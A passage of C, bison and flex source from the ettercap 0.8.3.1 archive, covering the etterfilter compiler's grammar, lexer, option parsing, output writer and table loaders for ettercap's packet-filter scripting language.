TOKEN_ELSE /* } else { */ %token TOKEN_OP_AND /* && */ %token TOKEN_OP_OR /* || */ %token TOKEN_OP_ASSIGN /* = */ %token TOKEN_OP_INC /* += */ %token TOKEN_OP_DEC /* -= */ %token TOKEN_OP_CMP_NEQ /* != */ %token TOKEN_OP_CMP_EQ /* == */ %token TOKEN_OP_CMP_LT /* < */ %token TOKEN_OP_CMP_GT /* > */ %token TOKEN_OP_CMP_LEQ /* <= */ %token TOKEN_OP_CMP_GEQ /* >= */ %token TOKEN_OP_END /* ; */ %token TOKEN_PAR_OPEN /* ( */ %token TOKEN_PAR_CLOSE /* ) */ %token TOKEN_BLK_BEGIN /* { */ %token TOKEN_BLK_END /* } */ %token TOKEN_UNKNOWN /* non terminals */ %type instruction %type condition %type offset %type math_expr %type block %type single_instruction %type if_statement %type if_else_statement %type conditions_block /* precedences */ %left TOKEN_OP_SUB TOKEN_OP_ADD %left TOKEN_OP_MUL TOKEN_OP_DIV %left TOKEN_UMINUS /* unary minus */ %left TOKET_OP_AND %left TOKET_OP_OR %left TOKET_OP_NOT %% /* * ========================================== * GRAMMAR Definitions * ========================================== */ /* general line, can be empty or not */ input: /* empty line */ | input block { /* * at this point the meta-tree is completed, * we only have to link it to the entry point */ compiler_set_root($2); } ; block: /* empty block */ { $$ = NULL; } | single_instruction block { ef_debug(2, "\t\t block_add single\n"); $$ = compiler_add_instr($1, $2); } | if_statement block { ef_debug(2, "\t\t block_add if\n"); $$ = compiler_add_ifblk($1, $2); } | if_else_statement block { ef_debug(2, "\t\t block_add if_else\n"); $$ = compiler_add_ifblk($1, $2); } ; /* every instruction must be terminated with ; */ single_instruction: instruction TOKEN_OP_END { $$ = compiler_create_instruction(&$1); } ; /* instructions are functions or assignments */ instruction: TOKEN_FUNCTION { ef_debug(1, "."); ef_debug(3, "\tfunction\n"); /* functions are encoded by the lexycal analyzer */ } | offset TOKEN_OP_ASSIGN TOKEN_STRING { ef_debug(1, "="); ef_debug(3, "\tassignment string\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_ASSIGN; $$.op.assign.string = (u_char*)calloc($3.op.assign.slen, sizeof(char)); $$.op.assign.slen = $3.op.assign.slen; /* this is a string */ $$.op.assign.size = 0; memcpy($$.op.assign.string, $3.op.assign.string, $3.op.assign.slen); } | offset TOKEN_OP_ASSIGN math_expr { ef_debug(1, "="); ef_debug(3, "\tassignment\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_ASSIGN; $$.op.assign.value = $3.op.assign.value; } | offset TOKEN_OP_INC TOKEN_CONST { ef_debug(1, "+="); ef_debug(3, "\tincrement\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_INC; $$.op.assign.value = $3.op.assign.value; } | offset TOKEN_OP_DEC TOKEN_CONST { ef_debug(1, "-="); ef_debug(3, "\tdecrement\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_DEC; $$.op.assign.value = $3.op.assign.value; } ; /* the if statement */ if_statement: TOKEN_IF TOKEN_PAR_OPEN conditions_block TOKEN_PAR_CLOSE TOKEN_BLK_BEGIN block TOKEN_BLK_END { ef_debug(1, "#"); ef_debug(3, "\t\t IF BLOCK\n"); $$ = compiler_create_ifblock($3, $6); } ; /* if {} else {} */ if_else_statement: TOKEN_IF TOKEN_PAR_OPEN conditions_block TOKEN_PAR_CLOSE TOKEN_BLK_BEGIN block TOKEN_BLK_END TOKEN_ELSE TOKEN_BLK_BEGIN block TOKEN_BLK_END { ef_debug(1, "@"); ef_debug(3, "\t\t IF ELSE BLOCK\n"); $$ = compiler_create_ifelseblock($3, $6, $10); } ; /* conditions used by the if statement */ conditions_block: condition { ef_debug(1, "?"); ef_debug(3, "\t\t CONDITION\n"); $$ = compiler_create_condition(&$1); } | conditions_block TOKEN_OP_AND conditions_block { ef_debug(1, "&"); ef_debug(3, "\t\t AND\n"); $$ = compiler_concat_conditions($1, COND_AND, $3); } | conditions_block TOKEN_OP_OR conditions_block { ef_debug(1, "|"); ef_debug(3, "\t\t OR\n"); $$ = compiler_concat_conditions($1, COND_OR, $3); } ; /* a single condition */ condition: offset TOKEN_OP_CMP_EQ TOKEN_STRING { ef_debug(4, "\tcondition cmp eq string\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_EQ; $$.op.test.string = (u_char*)calloc($3.op.assign.slen, sizeof(char)); $$.op.test.slen = $3.op.assign.slen; /* this is a string */ $$.op.test.size = 0; memcpy($$.op.test.string, $3.op.test.string, $3.op.assign.slen); } | offset TOKEN_OP_CMP_NEQ TOKEN_STRING { ef_debug(4, "\tcondition cmp not eq string\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_NEQ; $$.op.test.string = (u_char*)calloc($3.op.assign.slen, sizeof(char)); $$.op.test.slen = $3.op.assign.slen; /* this is a string */ $$.op.test.size = 0; memcpy($$.op.test.string, $3.op.test.string, $3.op.assign.slen); } | offset TOKEN_OP_CMP_EQ TOKEN_CONST { ef_debug(4, "\tcondition cmp eq\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_EQ; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | offset TOKEN_OP_CMP_NEQ TOKEN_CONST { ef_debug(4, "\tcondition cmp not eq\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_NEQ; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | offset TOKEN_OP_CMP_LT TOKEN_CONST { ef_debug(4, "\tcondition cmp lt\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_LT; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | offset TOKEN_OP_CMP_GT TOKEN_CONST { ef_debug(4, "\tcondition cmp gt\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_GT; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | offset TOKEN_OP_CMP_LEQ TOKEN_CONST { ef_debug(4, "\tcondition cmp leq\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_LEQ; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | offset TOKEN_OP_CMP_GEQ TOKEN_CONST { ef_debug(4, "\tcondition cmp geq\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.opcode = FOP_TEST; $$.op.test.op = FTEST_GEQ; $$.op.test.value = $3.op.test.value; memcpy(&$$.op.test.ipaddr, &$3.op.test.ipaddr, sizeof($3.op.test.ipaddr)); } | TOKEN_FUNCTION { ef_debug(4, "\tcondition func\n"); /* functions are encoded by the lexycal analyzer */ } ; /* offsets definitions */ offset: TOKEN_OFFSET { ef_debug(4, "\toffset\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); } | offset TOKEN_OP_ADD math_expr { ef_debug(4, "\toffset add\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); /* * we are lying here, but math_expr operates * only on values, so we can add it to offset */ $$.op.test.offset = $1.op.test.offset + $3.op.test.value; if ($$.op.test.offset % $$.op.test.size) WARNING("Unaligned offset"); } | offset TOKEN_OP_SUB math_expr { ef_debug(4, "\toffset sub\n"); memcpy(&$$, &$1, sizeof(struct filter_op)); $$.op.test.offset = $1.op.test.offset - $3.op.test.value; if ($$.op.test.offset % $$.op.test.size) WARNING("Unaligned offset"); } ; /* math expression */ math_expr: TOKEN_CONST { $$.op.test.value = $1.op.test.value; } | math_expr TOKEN_OP_ADD math_expr { $$.op.test.value = $1.op.test.value + $3.op.test.value; } | math_expr TOKEN_OP_SUB math_expr { $$.op.test.value = $1.op.test.value - $3.op.test.value; } | math_expr TOKEN_OP_MUL math_expr { $$.op.test.value = $1.op.test.value * $3.op.test.value; } | math_expr TOKEN_OP_DIV math_expr { $$.op.test.value = ($3.op.test.value == 0) ? 0 : $1.op.test.value / $3.op.test.value; } | TOKEN_OP_SUB math_expr %prec TOKEN_UMINUS { $$.op.test.value = -$2.op.test.value; } ; %% /* * ========================================== * C Code * ========================================== */ /* * name of the tokens as they should be presented to the user */ struct { char *name; char *string; } errors_array[] = { { "TOKEN_CONST", "integer or ip address" }, { "TOKEN_OFFSET", "offset" }, { "TOKEN_FUNCTION", "function" }, { "TOKEN_STRING", "string" }, { "TOKEN_IF", "'if'" }, { "TOKEN_ELSE", "'else'" }, { "TOKEN_OP_AND", "'&&'" }, { "TOKEN_OP_OR", "'||'" }, { "TOKEN_OP_ASSIGN", "'='" }, { "TOKEN_OP_INC", "'+='" }, { "TOKEN_OP_DEC", "'-='" }, { "TOKEN_OP_CMP_NEQ", "'!='" }, { "TOKEN_OP_CMP_EQ", "'=='" }, { "TOKEN_OP_CMP_LT", "'<'" }, { "TOKEN_OP_CMP_GT", "'>'" }, { "TOKEN_OP_CMP_LEQ", "'<='" }, { "TOKEN_OP_CMP_GEQ", "'>='" }, { "TOKEN_OP_END", "';'" }, { "TOKEN_OP_ADD", "'+'" }, { "TOKEN_OP_MUL", "'*'" }, { "TOKEN_OP_DIV", "'/'" }, { "TOKEN_OP_SUB", "'-'" }, { "TOKEN_PAR_OPEN", "'('" }, { "TOKEN_PAR_CLOSE", "')'" }, { "TOKEN_BLK_BEGIN", "'{'" }, { "TOKEN_BLK_END", "'}'" }, { "$end", "end of file" }, { NULL, NULL } }; /* * This function is needed by bison. so it MUST exist. * It is the error handler. */ int yyerror(const char *s) { char *error; int i = 0; /* make a copy to manipulate it */ error = strdup(s); /* subsitute the error code with frendly messages */ do { str_replace(&error, errors_array[i].name, errors_array[i].string); } while(errors_array[++i].name != NULL); /* special case for UNKNOWN */ if (strstr(error, "TOKEN_UNKNOWN")) { str_replace(&error, "TOKEN_UNKNOWN", "'TOKEN_UNKNOWN'"); str_replace(&error, "TOKEN_UNKNOWN", yylval.string); } /* print the actual error message */ SCRIPT_ERROR("%s", error); SAFE_FREE(error); /* return the error */ return 1; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_main.c000664 000000 000000 00000006774 13711276346 020733 0ustar00rootroot000000 000000 /* etterfilter -- filter compiler for ettercap content filtering engine Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define EF_GBL_FREE(x) do{ if (x != NULL) { free(x); x = NULL; } }while(0) /* globals */ extern FILE * yyin; /* from scanner */ extern int yyparse (void); /* from parser */ /* global options */ struct ec_globals *ec_gbls; struct ef_globals *ef_gbls; /*******************************************/ int main(int argc, char *argv[]) { int ret_value = 0; libettercap_init(PROGRAM, EC_VERSION); ef_globals_alloc(); select_text_interface(); libettercap_ui_init(); /* etterfilter copyright */ USER_MSG("\n" EC_COLOR_BOLD "%s %s" EC_COLOR_END " copyright %s %s\n\n", PROGRAM, EC_VERSION, EC_COPYRIGHT, EC_AUTHORS); /* initialize the line number */ EF_GBL->lineno = 1; /* getopt related parsing... */ parse_options(argc, argv); /* set the input for source file */ if (EF_GBL_OPTIONS->source_file) { yyin = fopen(EF_GBL_OPTIONS->source_file, "r"); if (yyin == NULL) FATAL_ERROR("Input file not found !"); } else { FATAL_ERROR("No source file."); } /* no buffering */ setbuf(yyin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); /* load the tables in etterfilter.tbl */ load_tables(); /* load the constants in etterfilter.cnt */ load_constants(); /* print the message */ USER_MSG("\n Parsing source file \'%s\' ", EF_GBL_OPTIONS->source_file); ef_debug(1, "\n"); /* begin the parsing */ if (yyparse() == 0) USER_MSG(" done.\n\n"); else USER_MSG("\n\nThe script contains errors...\n\n"); /* write to file */ ret_value = write_output(); if (ret_value == -E_NOTHANDLED) FATAL_ERROR("Cannot write output file (%s): the filter is not correctly handled.", EF_GBL_OPTIONS->output_file); else if (ret_value == -E_INVALID) FATAL_ERROR("Cannot write output file (%s): the filter format is not correct. ", EF_GBL_OPTIONS->output_file); ef_exit(0); } /* * print debug information */ void ef_debug(u_char level, const char *message, ...) { va_list ap; /* if not in debug don't print anything */ if (EF_GBL_OPTIONS->debug < level) return; /* print the message */ va_start(ap, message); vfprintf (stderr, message, ap); fflush(stderr); va_end(ap); } void ef_globals_alloc(void) { SAFE_CALLOC(ef_gbls, 1, sizeof(struct ef_globals)); return; } void ef_globals_free(void) { SAFE_FREE(ef_gbls->source_file); SAFE_FREE(ef_gbls->output_file); SAFE_FREE(ef_gbls); return; } void ef_exit(int code) { libettercap_ui_cleanup(); ef_globals_free(); exit(code); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_output.c000664 000000 000000 00000012163 13711276346 021334 0ustar00rootroot000000 000000 /* etterfilter -- the actual compiler Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* protos */ static void print_progress_bar(struct filter_op *fop); static size_t create_data_segment(u_char **data, struct filter_header *fh, struct filter_op *fop, size_t n); static size_t add_data_segment(u_char **data, size_t base, u_char **string, size_t slen); /*******************************************/ int write_output(void) { int fd; struct filter_op *fop; struct filter_header fh; size_t ninst, i, data_len; u_char pad = 0, *data = NULL; /* conver the tree to an array of filter_op */ ninst = compile_tree(&fop); if (fop == NULL) return -E_NOTHANDLED; if (ninst == 0) return -E_INVALID; /* create the file */ fd = open(EF_GBL_OPTIONS->output_file, O_CREAT | O_RDWR | O_TRUNC | O_BINARY, 0644); ON_ERROR(fd, -1, "Can't create file %s", EF_GBL_OPTIONS->output_file); /* display the message */ USER_MSG(" Writing output to \'%s\' ", EF_GBL_OPTIONS->output_file); /* compute the header */ fh.magic = htons(EC_FILTER_MAGIC); strncpy(fh.version, EC_VERSION, sizeof(fh.version)); fh.data = sizeof(fh); data_len = create_data_segment(&data, &fh, fop, ninst); /* write the header */ write(fd, &fh, sizeof(struct filter_header)); /* write the data segment */ write(fd, data, data_len); /* write padding to next 8-byte boundary */ for (i = 0; i < fh.code - (fh.data + data_len); i++) write(fd, &pad, 1); /* write the instructions */ for (i = 0; i < ninst; i++) { print_progress_bar(&fop[i]); write(fd, &fop[i], sizeof(struct filter_op)); } close(fd); USER_MSG(" done.\n\n"); USER_MSG(" -> Script encoded into %d instructions.\n\n", (int)(i - 1)); return E_SUCCESS; } /* * creates the data segment into an byte array supplied as argument data * and update the file header instruction pointer 8-byte aligned * * returns length of the data segment */ static size_t create_data_segment(u_char** data, struct filter_header *fh, struct filter_op *fop, size_t n) { size_t i, len = 0; for (i = 0; i < n; i++) { switch(fop[i].opcode) { case FOP_FUNC: if (fop[i].op.func.slen) { ef_debug(1, "@"); len += add_data_segment(data, len, &fop[i].op.func.string, fop[i].op.func.slen); } if (fop[i].op.func.rlen) { ef_debug(1, "@"); len += add_data_segment(data, len, &fop[i].op.func.replace, fop[i].op.func.rlen); } break; case FOP_TEST: if (fop[i].op.test.slen) { ef_debug(1, "@"); len += add_data_segment(data, len, &fop[i].op.test.string, fop[i].op.test.slen); } break; case FOP_ASSIGN: if (fop[i].op.assign.slen) { ef_debug(1, "@"); len += add_data_segment(data, len, &fop[i].op.test.string, fop[i].op.test.slen); } break; } } /* where starts the code ? */ fh->code = fh->data + len; /* 8-byte aligned please */ if (fh->code % 8) fh->code += 8 - fh->code % 8; return len; } /* * add a string to the buffer */ static size_t add_data_segment(u_char **data, size_t base, u_char **string, size_t slen) { /* make room for the new string */ SAFE_REALLOC(*data, base + slen + 1); /* copy the string, NULL separated */ memcpy(*data + base, *string, slen + 1); /* * change the pointer to the new string location * it is an offset from the base of the data segment */ *string = (u_char *)base; /* retur the len of the added string */ return slen + 1; } /* * prints a differnt sign for every different instruction */ static void print_progress_bar(struct filter_op *fop) { switch(fop->opcode) { case FOP_EXIT: ef_debug(1, "!"); break; case FOP_TEST: ef_debug(1, "?"); break; case FOP_ASSIGN: ef_debug(1, "="); break; case FOP_FUNC: ef_debug(1, "."); break; case FOP_JMP: ef_debug(1, ":"); break; case FOP_JTRUE: case FOP_JFALSE: ef_debug(1, ";"); break; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_parser.c000664 000000 000000 00000007210 13711276346 021265 0ustar00rootroot000000 000000 /* etterfilter -- parsing utilities Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #ifdef HAVE_GETOPT_H #include #else #include #endif /* protos... */ static void ef_usage(void); /*********************************************/ void ef_usage(void) { fprintf(stdout, "\nUsage: %s [OPTIONS] filterfile\n", PROGRAM); fprintf(stdout, "\nGeneral Options:\n"); fprintf(stdout, " -o, --output output file (default is filter.ef)\n"); fprintf(stdout, " -t, --test test the file (debug mode)\n"); fprintf(stdout, " -d, --debug print some debug info while compiling\n"); fprintf(stdout, " -w, --suppress-warnings ignore warnings during compilation\n"); fprintf(stdout, "\nStandard Options:\n"); fprintf(stdout, " -v, --version prints the version and exit\n"); fprintf(stdout, " -h, --help this help screen\n"); fprintf(stdout, "\n\n"); ef_exit(0); } void parse_options(int argc, char **argv) { int c; static struct option long_options[] = { { "help", no_argument, NULL, 'h' }, { "version", no_argument, NULL, 'v' }, { "test", required_argument, NULL, 't' }, { "output", required_argument, NULL, 'o' }, { "debug", no_argument, NULL, 'd' }, { "suppress-warning", no_argument, NULL, 'w' }, { 0 , 0 , 0 , 0} }; optind = 0; while ((c = getopt_long (argc, argv, "do:ht:vw", long_options, (int *)0)) != EOF) { switch (c) { case 't': test_filter(optarg); break; case 'o': EF_GBL_OPTIONS->output_file = strdup(optarg); break; case 'd': /* use many times to encrease debug level */ EF_GBL_OPTIONS->debug++; break; case 'w': EF_GBL_OPTIONS->suppress_warnings = 1; break; case 'h': ef_usage(); break; case 'v': printf("%s %s\n", PROGRAM, EC_VERSION); ef_exit(0); break; case ':': // missing parameter fprintf(stdout, "\nTry `%s --help' for more options.\n\n", PROGRAM); ef_exit(0); break; case '?': // unknown option fprintf(stdout, "\nTry `%s --help' for more options.\n\n", PROGRAM); ef_exit(0); break; } } /* the source file to be compiled */ if (argv[optind]) { EF_GBL_OPTIONS->source_file = strdup(argv[optind]); } /* make the default name */ if (EF_GBL_OPTIONS->output_file == NULL) EF_GBL_OPTIONS->output_file = strdup("filter.ef"); return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_syntax.l000664 000000 000000 00000007700 13711276346 021334 0ustar00rootroot000000 000000 /* etterfilter -- syntax for filter source files Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ %{ #include #include #include /* from bison */ #include %} /* * ========================================== * FLEX Declarations * ========================================== */ %option noyywrap %option nounput %option noinput OFFSET [[:alnum:]]+\.[A-Za-z]+[\.[A-Za-z]+]* FUNCTION [a-z_]+\((.*\".*\"[^)]*)*\) CONST [0-9]+|0x[0-9a-fA-F]+|[A-Z6]+ STRING \"([^\0"\\]*(\\.[^\0"\\]*)*)\" IPADDR \'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\' IP6ADDR \'[0-9a-fA-F]{4}[0-9a-fA-F:]+:[0-9a-fA-F]{1,4}\'|\'::1\' SPACES [ \t]+ %% "if" { ef_debug(5, "IF\n"); return TOKEN_IF; } "else" { ef_debug(5, "ELSE\n"); return TOKEN_ELSE; } "&&" { return TOKEN_OP_AND; } "||" { return TOKEN_OP_OR; } "!=" { return TOKEN_OP_CMP_NEQ; } "==" { return TOKEN_OP_CMP_EQ; } "<" { return TOKEN_OP_CMP_LT; } ">" { return TOKEN_OP_CMP_GT; } "<=" { return TOKEN_OP_CMP_LEQ; } ">=" { return TOKEN_OP_CMP_GEQ; } "=" { return TOKEN_OP_ASSIGN; } "+=" { return TOKEN_OP_INC; } "-=" { return TOKEN_OP_DEC; } "*" { return TOKEN_OP_MUL; } "+" { return TOKEN_OP_ADD; } "-" { return TOKEN_OP_SUB; } "/" { return TOKEN_OP_DIV; } "(" { return TOKEN_PAR_OPEN; } ")" { return TOKEN_PAR_CLOSE; } "{" { return TOKEN_BLK_BEGIN; } "}" { return TOKEN_BLK_END; } ";" { return TOKEN_OP_END; } {OFFSET} { ef_debug(4, "OFFSET: %s\n", yytext); if (encode_offset(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Offset \"%s\" not recognized", yytext); return TOKEN_OFFSET; } {FUNCTION} { ef_debug(4, "FUNCTION: %s\n", yytext); if (encode_function(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Function \"%s\" not recognized", yytext); return TOKEN_FUNCTION; } {CONST} { ef_debug(4, "CONST: %s\n", yytext); if (encode_const(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Constant \"%s\" not recognized", yytext); return TOKEN_CONST; } {STRING} { ef_debug(4, "STRING: %s\n", yytext); if (encode_const(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Invalid string [%s]", yytext); return TOKEN_STRING; } {IPADDR} { ef_debug(4, "IPADDR: %s\n", yytext); if (encode_const(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Invalid ip address [%s]", yytext); /* ip addresses are translated into network order integer */ return TOKEN_CONST; } {IP6ADDR} { ef_debug(4, "IP6ADDR: %s\n", yytext); if (encode_const(yytext, &yylval.fop) != E_SUCCESS) SCRIPT_ERROR("Invalid ipv6 address [%s]", yytext); /* ip addresses are translated into network order integer */ return TOKEN_CONST; } {SPACES} /* eat up the blank spaces */ "/*".*"*/" /* eat up one line comments */ "#".* [\n\r] { /* increment the line number (used for error reporting) */ EF_GBL->lineno++; } . { yylval.string = strdup(yytext); return TOKEN_UNKNOWN; } %% /* * ========================================== * C Code * ========================================== */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/utils/etterfilter/ef_tables.c000664 000000 000000 00000020033 13711276346 021241 0ustar00rootroot000000 000000 /* etterfilter -- offset tables handling Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct off_entry { char *name; u_int16 offset; u_int8 size; SLIST_ENTRY(off_entry) next; }; struct table_entry { char * name; u_int8 level; SLIST_HEAD (, off_entry) offsets; SLIST_ENTRY(table_entry) next; }; static SLIST_HEAD (, table_entry) table_head; struct const_entry { char *name; u_int32 value; SLIST_ENTRY(const_entry) next; }; static SLIST_HEAD (, const_entry) const_head; /* protos */ void load_tables(void); static void add_virtualpointer(char *name, u_int8 level, char *offname, u_int16 offset, u_int8 size); int get_virtualpointer(char *name, char *offname, u_int8 *level, u_int16 *offset, u_int8 *size); void load_constants(void); int get_constant(char *name, u_int32 *value); /*******************************************/ /* * load the tables for file */ void load_tables(void) { struct table_entry *t; FILE *fc; char line[128]; int lineno = 0, ntables = 0; char *p, *q, *end; char *name = NULL, *oname = NULL; u_int8 level = 0, size = 0; u_int16 offset = 0; char *tok; /* open the file */ fc = open_data("share", "etterfilter.tbl", FOPEN_READ_TEXT); ON_ERROR(fc, NULL, "Cannot find file etterfilter.tbl"); /* read the file */ while (fgets(line, 128, fc) != 0) { /* pointer to the end of the line */ end = line + strlen(line); /* count the lines */ lineno++; /* trim out the comments */ if ((p = strchr(line, '#'))) *p = '\0'; /* trim out the new line */ if ((p = strchr(line, '\n'))) *p = '\0'; /* skip empty lines */ if (line[0] == '\0') continue; /* eat the empty spaces */ for (q = line; *q == ' ' && q < end; q++); /* skip empty lines */ if (*q == '\0') continue; /* begin of a new section */ if (*q == '[') { SAFE_FREE(name); /* get the name in the brackets [ ] */ if ((p = strchr(q, ']'))) *p = '\0'; else FATAL_ERROR("Parse error in etterfilter.conf on line %d", lineno); name = strdup(q + 1); ntables++; /* get the level in the next brackets [ ] */ q = p + 1; if ((p = strchr(q, ']'))) *p = '\0'; else FATAL_ERROR("Parse error in etterfilter.conf on line %d", lineno); level = atoi(q + 1); continue; } /* parse the offsets and add them to the table */ oname = ec_strtok(q, ":", &tok); q = ec_strtok(NULL, ":", &tok); if (q && ((p = strchr(q, ' ')) || (p = strchr(q, '=')))) *p = '\0'; else FATAL_ERROR("Parse error in etterfilter.conf on line %d", lineno); /* get the size */ size = atoi(q); /* get the offset */ for (q = p; !isdigit((int)*q) && q < end; q++); offset = atoi(q); /* add to the table */ add_virtualpointer(name, level, oname, offset, size); } /* print some nice information */ USER_MSG("\n%3d protocol tables loaded:\n", ntables); USER_MSG("\t"); SLIST_FOREACH(t, &table_head, next) USER_MSG("%s ", t->name); USER_MSG("\n"); fclose(fc); } /* * add a new virtual pointer to the table */ static void add_virtualpointer(char *name, u_int8 level, char *offname, u_int16 offset, u_int8 size) { struct table_entry *t; struct off_entry *o; int found = 0; /* search if the table already exist */ SLIST_FOREACH(t, &table_head, next) { if (!strcmp(t->name, name)) { found = 1; break; } } /* the table was not found */ if (!found) { SAFE_CALLOC(t, 1, sizeof(struct table_entry)); SAFE_CALLOC(o, 1, sizeof(struct off_entry)); /* fill the structures */ t->name = strdup(name); t->level = level; o->name = strdup(offname); o->offset = offset; o->size = size; SLIST_INSERT_HEAD(&t->offsets, o, next); SLIST_INSERT_HEAD(&table_head, t, next); } else { SAFE_CALLOC(o, 1, sizeof(struct off_entry)); /* fill the structures */ o->name = strdup(offname); o->offset = offset; o->size = size; /* t already points to the right tables */ SLIST_INSERT_HEAD(&t->offsets, o, next); } } /* * get a virtual pointer from the table */ int get_virtualpointer(char *name, char *offname, u_int8 *level, u_int16 *offset, u_int8 *size) { struct table_entry *t; struct off_entry *o; /* search the table and the offset */ SLIST_FOREACH(t, &table_head, next) { if (!strcmp(t->name, name)) { SLIST_FOREACH(o, &t->offsets, next) { if (!strcmp(o->name, offname)) { /* set the return values */ *size = o->size; *level = t->level; *offset = o->offset; return E_SUCCESS; } } return -E_NOTFOUND; } } return -E_NOTFOUND; } /* * load constants from the file */ void load_constants(void) { struct const_entry *c = NULL; FILE *fc; char line[128]; int lineno = 0, nconst = 0; char *p, *q, *end, *tok; /* open the file */ fc = open_data("share", "etterfilter.cnt", FOPEN_READ_TEXT); ON_ERROR(fc, NULL, "Cannot find file etterfilter.cnt"); /* read the file */ while (fgets(line, 128, fc) != 0) { /* pointer to the end of the line */ end = line + strlen(line); /* count the lines */ lineno++; /* trim out the comments */ if ((p = strchr(line, '#'))) *p = '\0'; /* trim out the new line */ if ((p = strchr(line, '\n'))) *p = '\0'; /* skip empty lines */ if (line[0] == '\0') continue; /* eat the empty spaces */ for (q = line; *q == ' ' && q < end; q++); /* get the constant */ if (strstr(line, "=") && (q = ec_strtok(line, "=", &tok)) != NULL) { /* trim out the space */ if ((p = strchr(q, ' '))) *p = '\0'; SAFE_CALLOC(c, 1, sizeof(struct const_entry)); /* get the name */ c->name = strdup(q); if ((q = ec_strtok(NULL, "=", &tok)) == NULL) FATAL_ERROR("Invalid constant on line %d", lineno); /* eat the empty spaces */ for (p = q; *p == ' ' && p < end; p++); c->value = strtoul(p, NULL, 16); /* update the counter */ nconst++; } else FATAL_ERROR("Invalid constant on line %d", lineno); /* insert in the list */ SLIST_INSERT_HEAD(&const_head, c, next); } /* print some nice information */ USER_MSG("\n%3d constants loaded:\n", nconst); 